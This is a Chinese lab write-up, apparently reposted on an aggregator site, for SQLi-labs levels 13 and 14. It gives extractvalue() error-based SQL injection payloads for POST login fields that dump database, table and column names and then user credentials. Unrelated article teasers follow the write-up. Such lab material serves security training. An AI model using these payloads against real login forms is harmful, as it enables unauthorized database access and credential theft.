SQLI-labs-第十三关和第十四关

目录

第十三关

1、判断注入点

2、判断当前数据库

3、爆表名

4、爆字段名

5、爆值

第十四关

1、判断注入点

知识点:POST方式的单引号和括号闭合错误,报错注入

第十三关

思路:

1、判断注入点

使用Burpsuite抓包

首先加入一个单引号,爆出了数据库语句错误,说明存在注入点,根据提示,这里可能是’)闭合错误

uname=admin&passwd=1') #  没有爆出错误,说明是单引号和括号的闭合错误

没有出现回显信息,可能是报错注入

2、判断当前数据库

报错注入,使用的函数extractvalue()

uname=admin&passwd=1') and extractvalue(1,concat(0x7e,database())) #

3、爆表名

uname=admin&passwd=1') and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1))) #

4、爆字段名

uname=admin&passwd=1') and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users'  limit 0,1))) #

通过修改limit的值,可以得到users表的字段为 id,username,password

5、爆值

uname=admin&passwd=1') and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#

uname=admin&passwd=1') and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))#

通过这样的方式就可以得到数据库的数据


第十四关

原理:双引号闭合错误的报错注入

1、判断注入点

uname=admin&passwd=1'

没有任何回显内容

uname=admin&passwd=1"

数据库语句报错,分析报错信息,可以判断为右边的双引号闭合错误

加上#,结果没有报错,可以确认为双引号的闭合问题

uname=admin&passwd=1"#

接下来的步骤就跟十三关的一致

爆库名

uname=admin&passwd=1" and extractvalue(1,concat(0x7e,database()))#


这篇文章就写到这里,哪里有疑问或者不好的欢迎批评指正

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/7901.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PCIE相关总结

1、概述 "PCIE 槽位" 指的是主板上的 Peripheral Component Interconnect Express (外围设备互联扩展)槽位。它是用于连接扩展卡(如显卡、网卡、声卡等)到主板的接口。PCI Express 是一种高速串行扩展总线标准&#xff…

#LLM入门 | langchain | RAG # 4.3_文档分割

上一章讨论了文档标准化加载,现在转向文档的细分,这虽简单却对后续工作有重大影响。 一、为什么要进行文档分割 模型大小和内存限制:大型GPT模型参数众多,需大量计算和内存,而硬件设备如GPU或TPU有内存限制&#xff…

538.把二叉搜索树转换成累加树

给出二叉 搜索 树的根节点,该树的节点值各不相同,请你将其转换为累加树(Greater Sum Tree),使每个节点 node 的新值 原树中大于或等于 node.val 的值之和。 方法一:递归 class Solution{int sum 0;publ…

Leetcode—706. 设计哈希映射【简单】(constexpr)

2024每日刷题(127) Leetcode—706. 设计哈希映射 数组实现代码 class MyHashMap { public:MyHashMap() {memset(arr, -1, sizeof(arr));}void put(int key, int value) {arr[key] value;}int get(int key) {if(arr[key] -1) {return -1;} return arr…

虚拟 DOM

当在虚拟 DOM 中嵌套子元素时&#xff0c;可以在 JSX 中使用嵌套的方式来描述。以下是在 h1 元素内部包含 span 元素的示例&#xff1a; const element ( <h1> Hello, <span>React</span> </h1> ); 在这个示例中&#xff0c;h1 元素内部包含了一个 s…

【JS】web浏览器访问本地系统字体列表

1、核心API&#xff1a; queryLocalFonts&#xff1b;以下为主要注意事项&#xff1a; 注意浏览器最低版本 需用户授权 网站是否安全&#xff0c;若不安全默认禁止获取本地字体列表 # 代码演示 export async function getLocalFonst() {if ("queryLocalFonts" in…

Deep Learning Part Eight Attention--24.5.3

注意力是全部。 --&#xff08;你若安好&#xff0c;就是夏天&#xff09;安夏的座右铭 00.引子 上一章我们使用 RNN 生成了文本&#xff0c;又通过连接两个 RNN&#xff0c;将一个时序数据转换为了另一个时序数据。我们将这个网络称为 seq2seq&#xff0c;并用它成功求解了简…

从哪些方面可以看出现货黄金价格走势?

现货黄金价格的走势受到多种因素的影响&#xff0c;我们可以从宏观经济环境、货币政策、供需关系、市场情绪和技术分析几个主要方面来观察和分析这一贵金属的价格动态。现货黄金作为全球投资市场中的避险资产&#xff0c;其价格波动往往能体现出复杂的经济和政治变化。 宏观经济…

前端开发中的组件是什么

在前端开发中&#xff0c;组件指的是一种可重用的、独立的模块&#xff0c;用于构建用户界面的一部分。 组件可以是按钮、输入框、导航栏、列表等各种UI元素&#xff0c;也可以是更复杂的功能模块&#xff0c;如轮播图、模态框、表单验证等。组件化是现代前端开发的重要概念&a…

一文读懂RPC的框架前后逻辑

目录 前言1. 没RPC2. 有RPC 前言 对于八股或者知识点&#xff0c;常会被说到RPC框架的知识点 本文主要讲解RPC的基本逻辑 那先讲讲没有RPC的时候是怎样的 1. 没RPC 分布式系统中的服务之间通常采用其他方式进行通信&#xff0c;其中一种常见的方式是使用RESTful API或者SO…

Java EE/Jakarta EE范畴一览

Java EE&#xff08;Java Platform, Enterprise Edition&#xff09;现在已经改名为Jakarta EE&#xff0c;是一套用于开发企业级应用的标准Java平台。它扩展了Java SE&#xff08;Standard Edition&#xff09;&#xff0c;添加了支持大规模、多层次、可靠、安全、可伸缩和可管…

脸爱云一脸通智慧管理平台 SystemMng 管理用户信息泄露漏洞(XVE-2024-9382)

0x01 产品简介 脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。 功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管…

树莓派的几种登录方式、及登录失败解决方式

使用TF卡安装树莓派的系统后&#xff0c;可以通过编辑TF卡里的文件来设置和启用 “ VNC ” 、“ SSH ” 和 “ 串口 ” 功能。不过&#xff0c;在使用中打开VNC和SSH可能并不直观或方便&#xff0c;因为这些服务通常在树莓派的系统内部配置和启动。但你可以通过以下步骤来设置和…

OpenCV 入门(三)—— 车牌筛选

OpenCV 入门系列&#xff1a; OpenCV 入门&#xff08;一&#xff09;—— OpenCV 基础 OpenCV 入门&#xff08;二&#xff09;—— 车牌定位 OpenCV 入门&#xff08;三&#xff09;—— 车牌筛选 OpenCV 入门&#xff08;四&#xff09;—— 车牌号识别 OpenCV 入门&#xf…

C++11 设计模式7 策略模式 ,Strategy

策略模式的概念&#xff1a; 策略模式&#xff08;Strategy Pattern&#xff09;是 C 中常用的一种行为设计模式&#xff0c;它能在运行时改变对象的行为。在策略模式中&#xff0c;一个类的行为或其算法可以在运行时更改。这种类型的设计模式属于行为模式。 在策略模式中&…

每日一题 礼物的最大价值

题目描述 礼物的最大价值_牛客题霸_牛客网 解题思路 这是一个典型的动态规划问题。我们可以使用一个二维数组 dp[][] 来存储到达每个格子时可以获得的最大价值。状态转移方程为 dp[i][j] max(dp[i-1][j], dp[i][j-1]) grid[i][j]&#xff0c;表示到达当前格子的最大价值是从…

Windows PC上从零开始部署ChatGML-6B-int4量化模型

引言 ChatGLM-6B是清华大学知识工程和数据挖掘小组&#xff08;Knowledge Engineering Group (KEG) & Data Mining at Tsinghua University&#xff09;发布的一个开源的对话机器人。6B表示这是ChatGLM模型的60亿参数的小规模版本&#xff0c;约60亿参数。 ChatGML-6B-in…

面试 Java 基础八股文十问十答第三十一期

面试 Java 基础八股文十问十答第三十一期 作者&#xff1a;程序员小白条&#xff0c;个人博客 相信看了本文后&#xff0c;对你的面试是有一定帮助的&#xff01;关注专栏后就能收到持续更新&#xff01; ⭐点赞⭐收藏⭐不迷路&#xff01;⭐ 1&#xff09;TreeMap 有了解过吗…

knife4j-openapi3 使用笔记

knife4j官方文档&#xff1a;https://doc.xiaominfo.com/docs/quick-start/start-knife4j-version 增强模式文档&#xff1a;https://doc.xiaominfo.com/docs/features/enhance 1.用法 &#xff08;1&#xff09;控制层 Tag(name “用户信息管理”) Tag(name "用户信…

代码随想录第四十六天|单词拆分

题目链接&#xff1a;. - 力扣&#xff08;LeetCode&#xff09;